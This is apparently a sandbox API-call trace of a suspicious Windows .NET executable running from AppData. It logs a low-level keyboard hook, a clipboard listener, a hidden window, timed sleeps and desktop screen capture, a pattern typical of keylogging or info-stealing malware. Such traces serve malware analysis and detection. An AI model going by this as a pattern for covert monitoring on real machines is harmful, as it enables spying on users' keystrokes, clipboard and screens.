[0234.922] CoTaskMemFree (pv=0x7f8470) [0234.922] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\", nBufferLength=0x105, lpBuffer=0x5f5daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\", lpFilePart=0x0) returned 0x25 [0234.922] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\WindowSearcher", nBufferLength=0x105, lpBuffer=0x5f5da90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\WindowSearcher", lpFilePart=0x0) returned 0x33 [0234.961] CoUninitialize () Thread: id = 234 os_tid = 0x43c [0234.966] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0234.993] GetCurrentProcessId () returned 0x7ec [0234.995] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x36c72b0, Length=0x20000, ResultLength=0x605f604 | out: SystemInformation=0x36c72b0, ResultLength=0x605f604*=0x87c0) returned 0x0 [0235.015] GetModuleHandleW (lpModuleName="sjfhjjskfsf") returned 0x0 [0235.026] SetWindowsHookExW (idHook=13, lpfn=0x4c6b73e, hmod=0x0, dwThreadId=0x0) returned 0x800ed [0235.033] GetCurrentProcess () returned 0xffffffff [0235.033] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x605f670, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x605f670*=0x4d8) returned 1 [0235.037] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLNAME") returned 0xc127 [0235.037] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLTYPE") returned 0xc128 [0235.040] GetSystemMetrics (nIndex=75) returned 1 [0235.052] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x0 [0235.055] LoadLibraryW (lpLibFileName="comctl32.dll") returned 0x75520000 [0235.061] GetModuleHandleW (lpModuleName="user32.dll") returned 0x76890000 [0235.062] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="DefWindowProcW", cchWideChar=14, lpMultiByteStr=0x605f3dc, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DefWindowProcWgqze\x9bÊ\x94Â\x86t ø\x05\x06\x80\x86\x7f", lpUsedDefaultChar=0x0) returned 14 [0235.062] GetProcAddress (hModule=0x76890000, lpProcName="DefWindowProcW") returned 0x77c425dd [0235.062] GetStockObject (i=5) returned 0x1900015 [0235.064] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0235.066] CoTaskMemAlloc (cb=0x5a) returned 0x7eab70 [0235.066] RegisterClassW (lpWndClass=0x605f3cc) returned 0xc129 [0235.066] CoTaskMemFree (pv=0x7eab70) [0235.066] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0235.067] CreateWindowExW (dwExStyle=0x0, lpClassName="WindowsForms10.Window.8.app.0.5c39d4_r27_ad1", lpWindowName=0x0, dwStyle=0x2010000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0xfffffffd, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x5014a [0235.067] SetWindowLongW (hWnd=0x5014a, nIndex=-4, dwNewLong=2009343453) returned 80131942 [0235.068] GetWindowLongW (hWnd=0x5014a, nIndex=-4) returned 2009343453 [0235.069] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x605ecdc | out: phkResult=0x605ecdc*=0x4e0) returned 0x0 [0235.069] RegQueryValueExW (in: hKey=0x4e0, lpValueName="DbgJITDebugLaunchSetting", lpReserved=0x0, lpType=0x605ecfc, lpData=0x0, lpcbData=0x605ecf8*=0x0 | out: lpType=0x605ecfc*=0x0, lpData=0x0, lpcbData=0x605ecf8*=0x0) returned 0x2 [0235.069] RegQueryValueExW (in: hKey=0x4e0, lpValueName="DbgManagedDebugger", lpReserved=0x0, lpType=0x605ecfc, lpData=0x0, lpcbData=0x605ecf8*=0x0 | out: lpType=0x605ecfc*=0x0, lpData=0x0, lpcbData=0x605ecf8*=0x0) returned 0x2 [0235.069] RegCloseKey (hKey=0x4e0) returned 0x0 [0235.072] SetWindowLongW (hWnd=0x5014a, nIndex=-4, dwNewLong=80131982) returned 2009343453 [0235.072] GetWindowLongW (hWnd=0x5014a, nIndex=-4) returned 80131982 [0235.072] GetWindowLongW (hWnd=0x5014a, nIndex=-16) returned 113311744 [0235.072] RegisterClipboardFormatW (lpszFormat="WinFormsMouseEnter") returned 0xc12a [0235.073] RegisterClipboardFormatW (lpszFormat="WinFormsUnSubclass") returned 0xc12b [0235.073] CallWindowProcW (lpPrevWndFunc=0x77c425dd, hWnd=0x5014a, Msg=0x81, wParam=0x0, lParam=0x605efa8) returned 0x1 [0235.073] CallWindowProcW (lpPrevWndFunc=0x77c425dd, hWnd=0x5014a, Msg=0x83, wParam=0x0, lParam=0x605ef94) returned 0x0 [0235.073] CallWindowProcW (lpPrevWndFunc=0x77c425dd, hWnd=0x5014a, Msg=0x1, wParam=0x0, lParam=0x605efa8) returned 0x0 [0235.074] GetClientRect (in: hWnd=0x5014a, lpRect=0x605ed10 | out: lpRect=0x605ed10) returned 1 [0235.074] GetWindowRect (in: hWnd=0x5014a, lpRect=0x605ed10 | out: lpRect=0x605ed10) returned 1 [0235.075] GetParent (hWnd=0x5014a) returned 0x0 [0235.077] OleInitialize (pvReserved=0x0) returned 0x80010106 [0235.078] CoRegisterMessageFilter (in: lpMessageFilter=0x0, lplpMessageFilter=0x605f5ec | out: lplpMessageFilter=0x605f5ec*=0x0) returned 0x80004021 [0235.080] PeekMessageW (in: lpMsg=0x605f5c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x605f5c0) returned 0 [0235.082] PeekMessageW (in: lpMsg=0x605f5c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x605f5c0) returned 0 Thread: id = 235 os_tid = 0x6f0 [0235.070] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0235.150] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x75520000 [0235.152] AdjustWindowRectEx (in: lpRect=0x5f5f5a0, dwStyle=0x56cf0000, bMenu=0, dwExStyle=0x50001 | out: lpRect=0x5f5f5a0) returned 1 [0235.152] GetCurrentProcess () returned 0xffffffff [0235.152] GetCurrentThread () returned 0xfffffffe [0235.152] GetCurrentProcess () returned 0xffffffff [0235.152] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5f5f4b8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5f5f4b8*=0x4e4) returned 1 [0235.152] GetCurrentThreadId () returned 0x6f0 [0235.152] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x75520000 [0235.153] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0235.153] CreateWindowExW (dwExStyle=0x0, lpClassName="WindowsForms10.Window.8.app.0.5c39d4_r27_ad1", lpWindowName=0x0, dwStyle=0x2010000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0xfffffffd, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x10156 [0235.153] SetWindowLongW (hWnd=0x10156, nIndex=-4, dwNewLong=2009343453) returned 80131942 [0235.153] GetWindowLongW (hWnd=0x10156, nIndex=-4) returned 2009343453 [0235.153] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x5f5ebe0 | out: phkResult=0x5f5ebe0*=0x4e8) returned 0x0 [0235.153] RegQueryValueExW (in: hKey=0x4e8, lpValueName="DbgJITDebugLaunchSetting", lpReserved=0x0, lpType=0x5f5ec00, lpData=0x0, lpcbData=0x5f5ebfc*=0x0 | out: lpType=0x5f5ec00*=0x0, lpData=0x0, lpcbData=0x5f5ebfc*=0x0) returned 0x2 [0235.154] RegQueryValueExW (in: hKey=0x4e8, lpValueName="DbgManagedDebugger", lpReserved=0x0, lpType=0x5f5ec00, lpData=0x0, lpcbData=0x5f5ebfc*=0x0 | out: lpType=0x5f5ec00*=0x0, lpData=0x0, lpcbData=0x5f5ebfc*=0x0) returned 0x2 [0235.154] RegCloseKey (hKey=0x4e8) returned 0x0 [0235.154] SetWindowLongW (hWnd=0x10156, nIndex=-4, dwNewLong=80132022) returned 2009343453 [0235.154] GetWindowLongW (hWnd=0x10156, nIndex=-4) returned 80132022 [0235.154] GetWindowLongW (hWnd=0x10156, nIndex=-16) returned 113311744 [0235.154] CallWindowProcW (lpPrevWndFunc=0x77c425dd, hWnd=0x10156, Msg=0x24, wParam=0x0, lParam=0x5f5eeb8) returned 0x0 [0235.154] CallWindowProcW (lpPrevWndFunc=0x77c425dd, hWnd=0x10156, Msg=0x81, wParam=0x0, lParam=0x5f5eeac) returned 0x1 [0235.154] CallWindowProcW (lpPrevWndFunc=0x77c425dd, hWnd=0x10156, Msg=0x83, wParam=0x0, lParam=0x5f5ee98) returned 0x0 [0235.154] CallWindowProcW (lpPrevWndFunc=0x77c425dd, hWnd=0x10156, Msg=0x1, wParam=0x0, lParam=0x5f5eeac) returned 0x0 [0235.154] GetClientRect (in: hWnd=0x10156, lpRect=0x5f5ec14 | out: lpRect=0x5f5ec14) returned 1 [0235.154] GetWindowRect (in: hWnd=0x10156, lpRect=0x5f5ec14 | out: lpRect=0x5f5ec14) returned 1 [0235.155] GetParent (hWnd=0x10156) returned 0x0 [0235.240] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x75520000 [0235.241] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0235.241] CreateWindowExW (dwExStyle=0x50000, lpClassName="WindowsForms10.Window.8.app.0.5c39d4_r27_ad1", lpWindowName=0x0, dwStyle=0x2cf0000, X=-2147483648, Y=-2147483648, nWidth=300, nHeight=300, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x1015a [0235.241] SetWindowLongW (hWnd=0x1015a, nIndex=-4, dwNewLong=2009343453) returned 80131942 [0235.241] GetWindowLongW (hWnd=0x1015a, nIndex=-4) returned 2009343453 [0235.241] SetWindowLongW (hWnd=0x1015a, nIndex=-4, dwNewLong=80132102) returned 2009343453 [0235.241] GetWindowLongW (hWnd=0x1015a, nIndex=-4) returned 80132102 [0235.241] GetWindowLongW (hWnd=0x1015a, nIndex=-16) returned 114229248 [0235.493] CallWindowProcW (lpPrevWndFunc=0x77c425dd, hWnd=0x1015a, Msg=0x81, wParam=0x0, lParam=0x5f5efbc) returned 0x1 [0235.494] CallWindowProcW (lpPrevWndFunc=0x77c425dd, hWnd=0x1015a, Msg=0x83, wParam=0x0, lParam=0x5f5efa8) returned 0x0 [0235.527] CallWindowProcW (lpPrevWndFunc=0x77c425dd, hWnd=0x1015a, Msg=0x1, wParam=0x0, lParam=0x5f5efbc) returned 0x0 [0235.527] GetClientRect (in: hWnd=0x1015a, lpRect=0x5f5ecc8 | out: lpRect=0x5f5ecc8) returned 1 [0235.527] GetWindowRect (in: hWnd=0x1015a, lpRect=0x5f5ecc8 | out: lpRect=0x5f5ecc8) returned 1 [0235.528] GetStartupInfoW (in: lpStartupInfo=0x27eb9a0 | out: lpStartupInfo=0x27eb9a0*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0235.528] GetParent (hWnd=0x1015a) returned 0x0 [0235.528] SetWindowLongW (hWnd=0x1015a, nIndex=-8, dwNewLong=0) returned 0 [0235.532] GetSystemMetrics (nIndex=11) returned 32 [0235.532] GetSystemMetrics (nIndex=12) returned 32 [0235.533] GetDC (hWnd=0x0) returned 0x100107b8 [0235.536] GetDeviceCaps (hdc=0x100107b8, index=12) returned 32 [0235.536] GetDeviceCaps (hdc=0x100107b8, index=14) returned 1 [0235.536] ReleaseDC (hWnd=0x0, hDC=0x100107b8) returned 1 [0235.537] CreateIconFromResourceEx (presbits=0x27ee5f0, dwResSize=0x10a8, fIcon=1, dwVer=0x30000, cxDesired=0, cyDesired=0, Flags=0x0) returned 0x10157 [0235.537] GetSystemMetrics (nIndex=49) returned 16 [0235.537] GetSystemMetrics (nIndex=50) returned 16 [0235.538] CreateIconFromResourceEx (presbits=0x27ef6d4, dwResSize=0x468, fIcon=1, dwVer=0x30000, cxDesired=0, cyDesired=0, Flags=0x0) returned 0x10159 [0235.538] SendMessageW (hWnd=0x1015a, Msg=0x80, wParam=0x0, lParam=0x10159) returned 0x0 [0235.538] CallWindowProcW (lpPrevWndFunc=0x77c425dd, hWnd=0x1015a, Msg=0x80, wParam=0x0, lParam=0x10159) returned 0x0 [0235.539] SendMessageW (hWnd=0x1015a, Msg=0x80, wParam=0x1, lParam=0x10157) returned 0x0 [0235.539] CallWindowProcW (lpPrevWndFunc=0x77c425dd, hWnd=0x1015a, Msg=0x80, wParam=0x1, lParam=0x10157) returned 0x0 [0235.539] CallWindowProcW (lpPrevWndFunc=0x77c425dd, hWnd=0x1015a, Msg=0xd, wParam=0x104, lParam=0x5d2c5e0) returned 0x0 [0235.539] CallWindowProcW (lpPrevWndFunc=0x77c425dd, hWnd=0x1015a, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0x10159 [0235.540] CallWindowProcW (lpPrevWndFunc=0x77c425dd, hWnd=0x1015a, Msg=0xd, wParam=0x104, lParam=0x5d2c5e0) returned 0x0 [0235.540] GetSystemMenu (hWnd=0x1015a, bRevert=0) returned 0x1015d [0235.541] GetWindowPlacement (in: hWnd=0x1015a, lpwndpl=0x5f5f538 | out: lpwndpl=0x5f5f538) returned 1 [0235.541] EnableMenuItem (hMenu=0x1015d, uIDEnableItem=0xf020, uEnable=0x0) returned 0 [0235.541] EnableMenuItem (hMenu=0x1015d, uIDEnableItem=0xf030, uEnable=0x0) returned 0 [0235.541] EnableMenuItem (hMenu=0x1015d, uIDEnableItem=0xf060, uEnable=0x0) returned 0 [0235.541] EnableMenuItem (hMenu=0x1015d, uIDEnableItem=0xf120, uEnable=0x1) returned 0 [0235.542] EnableMenuItem (hMenu=0x1015d, uIDEnableItem=0xf000, uEnable=0x0) returned 0 [0235.542] GetClientRect (in: hWnd=0x1015a, lpRect=0x5f5f57c | out: lpRect=0x5f5f57c) returned 1 [0235.542] GetClientRect (in: hWnd=0x1015a, lpRect=0x5f5f4dc | out: lpRect=0x5f5f4dc) returned 1 [0235.542] GetWindowRect (in: hWnd=0x1015a, lpRect=0x5f5f4dc | out: lpRect=0x5f5f4dc) returned 1 [0235.542] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x75520000 [0235.542] GetWindowLongW (hWnd=0x1015a, nIndex=-16) returned 114229248 [0235.542] GetWindowTextLengthW (hWnd=0x1015a) returned 0 [0235.542] CallWindowProcW (lpPrevWndFunc=0x77c425dd, hWnd=0x1015a, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x0 [0235.543] GetSystemMetrics (nIndex=42) returned 0 [0235.543] GetWindowTextW (in: hWnd=0x1015a, lpString=0x5f5f488, nMaxCount=1 | out: lpString="") returned 0 [0235.543] CallWindowProcW (lpPrevWndFunc=0x77c425dd, hWnd=0x1015a, Msg=0xd, wParam=0x1, lParam=0x5f5f488) returned 0x0 [0235.544] GetWindowTextLengthW (hWnd=0x1015a) returned 0 [0235.544] CallWindowProcW (lpPrevWndFunc=0x77c425dd, hWnd=0x1015a, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x0 [0235.544] GetSystemMetrics (nIndex=42) returned 0 [0235.544] GetWindowTextW (in: hWnd=0x1015a, lpString=0x5f5f488, nMaxCount=1 | out: lpString="") returned 0 [0235.544] CallWindowProcW (lpPrevWndFunc=0x77c425dd, hWnd=0x1015a, Msg=0xd, wParam=0x1, lParam=0x5f5f488) returned 0x0 [0235.544] GetWindowLongW (hWnd=0x1015a, nIndex=-16) returned 114229248 [0235.544] GetWindowLongW (hWnd=0x1015a, nIndex=-20) returned 327936 [0235.544] SetWindowLongW (hWnd=0x1015a, nIndex=-16, dwNewLong=47120384) returned 114229248 [0235.544] CallWindowProcW (lpPrevWndFunc=0x77c425dd, hWnd=0x1015a, Msg=0x7c, wParam=0xfffffff0, lParam=0x5f5f4d0) returned 0x0 [0235.544] CallWindowProcW (lpPrevWndFunc=0x77c425dd, hWnd=0x1015a, Msg=0x7d, wParam=0xfffffff0, lParam=0x5f5f4d0) returned 0x0 [0235.544] CallWindowProcW (lpPrevWndFunc=0x77c425dd, hWnd=0x1015a, Msg=0xd, wParam=0x104, lParam=0x5d2c5e0) returned 0x0 [0235.544] SetWindowLongW (hWnd=0x1015a, nIndex=-20, dwNewLong=327680) returned 327936 [0235.544] CallWindowProcW (lpPrevWndFunc=0x77c425dd, hWnd=0x1015a, Msg=0x7c, wParam=0xffffffec, lParam=0x5f5f4d0) returned 0x0 [0235.544] CallWindowProcW (lpPrevWndFunc=0x77c425dd, hWnd=0x1015a, Msg=0x7d, wParam=0xffffffec, lParam=0x5f5f4d0) returned 0x0 [0235.545] CallWindowProcW (lpPrevWndFunc=0x77c425dd, hWnd=0x1015a, Msg=0xd, wParam=0x104, lParam=0x5d2c5e0) returned 0x0 [0235.545] SetWindowPos (hWnd=0x1015a, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x37) returned 1 [0235.545] CallWindowProcW (lpPrevWndFunc=0x77c425dd, hWnd=0x1015a, Msg=0x46, wParam=0x0, lParam=0x5f5f4f0) returned 0x0 [0235.545] CallWindowProcW (lpPrevWndFunc=0x77c425dd, hWnd=0x1015a, Msg=0x83, wParam=0x1, lParam=0x5f5f4c8) returned 0x0 [0235.546] GetWindowPlacement (in: hWnd=0x1015a, lpwndpl=0x5f5f274 | out: lpwndpl=0x5f5f274) returned 1 [0235.546] CallWindowProcW (lpPrevWndFunc=0x77c425dd, hWnd=0x1015a, Msg=0x47, wParam=0x0, lParam=0x5f5f4f0) returned 0x0 [0235.546] GetClientRect (in: hWnd=0x1015a, lpRect=0x5f5f224 | out: lpRect=0x5f5f224) returned 1 [0235.546] GetWindowRect (in: hWnd=0x1015a, lpRect=0x5f5f224 | out: lpRect=0x5f5f224) returned 1 [0235.546] CallWindowProcW (lpPrevWndFunc=0x77c425dd, hWnd=0x1015a, Msg=0xd, wParam=0x104, lParam=0x5d2c5e0) returned 0x0 [0235.546] CallWindowProcW (lpPrevWndFunc=0x77c425dd, hWnd=0x1015a, Msg=0x83, wParam=0x1, lParam=0x5f5f0d4) returned 0x0 [0235.547] RedrawWindow (hWnd=0x1015a, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0x85) returned 1 [0235.547] GetSystemMenu (hWnd=0x1015a, bRevert=0) returned 0x1015d [0235.547] GetWindowPlacement (in: hWnd=0x1015a, lpwndpl=0x5f5f528 | out: lpwndpl=0x5f5f528) returned 1 [0235.547] EnableMenuItem (hMenu=0x1015d, uIDEnableItem=0xf020, uEnable=0x0) returned 0 [0235.547] EnableMenuItem (hMenu=0x1015d, uIDEnableItem=0xf030, uEnable=0x0) returned 0 [0235.547] EnableMenuItem (hMenu=0x1015d, uIDEnableItem=0xf060, uEnable=0x0) returned 0 [0235.547] EnableMenuItem (hMenu=0x1015d, uIDEnableItem=0xf120, uEnable=0x1) returned 1 [0235.547] EnableMenuItem (hMenu=0x1015d, uIDEnableItem=0xf000, uEnable=0x0) returned 0 [0235.555] SetParent (hWndChild=0x1015a, hWndNewParent=0xfffffffd) returned 0x10010 [0235.555] CallWindowProcW (lpPrevWndFunc=0x77c425dd, hWnd=0x1015a, Msg=0x46, wParam=0x0, lParam=0x5f5f5a0) returned 0x0 [0235.562] AddClipboardFormatListener (hwnd=0x1015a) returned 1 [0235.567] ShowWindow (hWnd=0x1015a, nCmdShow=5) returned 0 [0235.567] CallWindowProcW (lpPrevWndFunc=0x77c425dd, hWnd=0x1015a, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0235.568] GetWindowThreadProcessId (in: hWnd=0x1015a, lpdwProcessId=0x5f5f08c | out: lpdwProcessId=0x5f5f08c) returned 0x6f0 [0235.568] GetCurrentThreadId () returned 0x6f0 [0235.569] RegisterClipboardFormatW (lpszFormat="WindowsForms12_ThreadCallbackMessage") returned 0xc12c [0235.569] PostMessageW (hWnd=0x1015a, Msg=0xc12c, wParam=0x0, lParam=0x0) returned 1 [0235.569] GetWindowTextLengthW (hWnd=0x1015a) returned 0 [0235.569] CallWindowProcW (lpPrevWndFunc=0x77c425dd, hWnd=0x1015a, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x0 [0235.569] GetSystemMetrics (nIndex=42) returned 0 [0235.569] GetWindowTextW (in: hWnd=0x1015a, lpString=0x5f5f014, nMaxCount=1 | out: lpString="") returned 0 [0235.569] CallWindowProcW (lpPrevWndFunc=0x77c425dd, hWnd=0x1015a, Msg=0xd, wParam=0x1, lParam=0x5f5f014) returned 0x0 [0235.571] CallWindowProcW (lpPrevWndFunc=0x77c425dd, hWnd=0x1015a, Msg=0x46, wParam=0x0, lParam=0x5f5f44c) returned 0x0 [0235.573] CallWindowProcW (lpPrevWndFunc=0x77c425dd, hWnd=0x1015a, Msg=0x46, wParam=0x0, lParam=0x5f5f44c) returned 0x0 [0235.573] CallWindowProcW (lpPrevWndFunc=0x77c425dd, hWnd=0x1015a, Msg=0x86, wParam=0x1, lParam=0x0) returned 0x1 [0235.573] CallWindowProcW (lpPrevWndFunc=0x77c425dd, hWnd=0x1015a, Msg=0xd, wParam=0x104, lParam=0x5d2c5e0) returned 0x0 [0235.573] CallWindowProcW (lpPrevWndFunc=0x77c425dd, hWnd=0x1015a, Msg=0xd, wParam=0x104, lParam=0x5d2c5e0) returned 0x0 [0235.573] OleInitialize (pvReserved=0x0) returned 0x0 [0235.573] CoRegisterMessageFilter (in: lpMessageFilter=0x0, lplpMessageFilter=0x5f5f1e0 | out: lplpMessageFilter=0x5f5f1e0*=0x0) returned 0x0 [0235.574] SetFocus (hWnd=0x1015a) returned 0x0 [0235.582] CallWindowProcW (lpPrevWndFunc=0x77c425dd, hWnd=0x1015a, Msg=0x281, wParam=0x1, lParam=0xc000000f) returned 0x0 [0235.584] CallWindowProcW (lpPrevWndFunc=0x77c425dd, hWnd=0x1015a, Msg=0x282, wParam=0x2, lParam=0x0) returned 0x0 [0235.586] GetParent (hWnd=0x1015a) returned 0x0 [0235.586] GetKeyboardLayout (idThread=0x0) returned 0x4090409 [0235.586] CallWindowProcW (lpPrevWndFunc=0x77c425dd, hWnd=0x1015a, Msg=0x7, wParam=0x0, lParam=0x0) returned 0x0 [0235.586] GetWindowPlacement (in: hWnd=0x1015a, lpwndpl=0x5f5f1d0 | out: lpwndpl=0x5f5f1d0) returned 1 [0235.586] CallWindowProcW (lpPrevWndFunc=0x77c425dd, hWnd=0x1015a, Msg=0x47, wParam=0x0, lParam=0x5f5f44c) returned 0x0 [0235.586] GetClientRect (in: hWnd=0x1015a, lpRect=0x5f5f180 | out: lpRect=0x5f5f180) returned 1 [0235.586] GetWindowRect (in: hWnd=0x1015a, lpRect=0x5f5f180 | out: lpRect=0x5f5f180) returned 1 [0235.586] CallWindowProcW (lpPrevWndFunc=0x77c425dd, hWnd=0x1015a, Msg=0xd, wParam=0x104, lParam=0x5d2c5e0) returned 0x0 [0235.586] CallWindowProcW (lpPrevWndFunc=0x77c425dd, hWnd=0x1015a, Msg=0x5, wParam=0x0, lParam=0x106011c) returned 0x0 [0235.586] CallWindowProcW (lpPrevWndFunc=0x77c425dd, hWnd=0x1015a, Msg=0x3, wParam=0x0, lParam=0x9b0085) returned 0x0 [0235.587] GetClientRect (in: hWnd=0x1015a, lpRect=0x5f5f1ac | out: lpRect=0x5f5f1ac) returned 1 [0235.587] GetWindowRect (in: hWnd=0x1015a, lpRect=0x5f5f1ac | out: lpRect=0x5f5f1ac) returned 1 [0235.587] PeekMessageW (in: lpMsg=0x5f5f53c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x5f5f53c) returned 1 [0235.587] IsWindowUnicode (hWnd=0x1015a) returned 1 [0235.587] GetMessageW (in: lpMsg=0x5f5f53c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x5f5f53c) returned 1 [0235.588] TranslateMessage (lpMsg=0x5f5f53c) returned 0 [0235.588] DispatchMessageW (lpMsg=0x5f5f53c) returned 0x0 [0235.589] PeekMessageW (in: lpMsg=0x5f5f53c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x5f5f53c) returned 0 [0235.589] PeekMessageW (in: lpMsg=0x5f5f53c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x5f5f53c) returned 0 [0235.589] WaitMessage () returned 1 [0236.058] PeekMessageW (in: lpMsg=0x5f5f53c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x5f5f53c) returned 1 [0236.059] IsWindowUnicode (hWnd=0x1015e) returned 1 [0236.059] GetMessageW (in: lpMsg=0x5f5f53c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x5f5f53c) returned 1 [0236.059] TranslateMessage (lpMsg=0x5f5f53c) returned 0 [0236.059] DispatchMessageW (lpMsg=0x5f5f53c) returned 0x0 [0236.059] PeekMessageW (in: lpMsg=0x5f5f53c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x5f5f53c) returned 0 [0236.059] PeekMessageW (in: lpMsg=0x5f5f53c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x5f5f53c) returned 0 [0236.059] WaitMessage () Thread: id = 236 os_tid = 0x5d8 [0235.172] CoGetContextToken (in: pToken=0x5adfec4 | out: pToken=0x5adfec4) returned 0x0 [0235.172] IUnknown:QueryInterface (in: This=0x766108, riid=0x749ad8c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5adfee8 | out: ppvObject=0x5adfee8*=0x766114) returned 0x0 [0235.172] IComThreadingInfo:GetCurrentThreadType (in: This=0x766114, pThreadType=0x5adff14 | out: pThreadType=0x5adff14*=0) returned 0x0 [0235.172] IUnknown:Release (This=0x766114) returned 0x1 [0235.172] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0235.172] SleepEx (dwMilliseconds=0xffffffff, bAlertable=1) returned 0xc0 [0235.174] SleepEx (dwMilliseconds=0xffffffff, bAlertable=1) returned 0xc0 [0235.178] SleepEx (dwMilliseconds=0x6ddd00, bAlertable=1) returned 0xc0 [0238.021] SleepEx (dwMilliseconds=0x186a0, bAlertable=1) returned 0x0 [0248.757] SleepEx (dwMilliseconds=0x15f81, bAlertable=1) returned 0x0 [0258.772] SleepEx (dwMilliseconds=0x13862, bAlertable=1) returned 0x0 [0268.787] SleepEx (dwMilliseconds=0x11142, bAlertable=1) returned 0x0 [0278.802] SleepEx (dwMilliseconds=0xea23, bAlertable=1) returned 0x0 [0288.817] SleepEx (dwMilliseconds=0xc304, bAlertable=1) returned 0x0 [0298.833] SleepEx (dwMilliseconds=0x9be4, bAlertable=1) Thread: id = 237 os_tid = 0x54c [0235.176] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0235.177] CoGetContextToken (in: pToken=0x615f944 | out: pToken=0x615f944) returned 0x0 [0235.177] IUnknown:QueryInterface (in: This=0x766108, riid=0x749ad8c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x615f968 | out: ppvObject=0x615f968*=0x766114) returned 0x0 [0235.177] IComThreadingInfo:GetCurrentThreadType (in: This=0x766114, pThreadType=0x615f994 | out: pThreadType=0x615f994*=0) returned 0x0 [0235.177] IUnknown:Release (This=0x766114) returned 0x1 [0235.177] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1 [0235.177] CoUninitialize () [0235.217] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\.", nBufferLength=0x105, lpBuffer=0x615d670, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933", lpFilePart=0x0) returned 0x2a [0235.318] GetDesktopWindow () returned 0x10010 [0235.376] GetWindowDC (hWnd=0x10010) returned 0x1401007f [0235.400] GetWindowRect (in: hWnd=0x10010, lpRect=0x615db80 | out: lpRect=0x615db80) returned 1 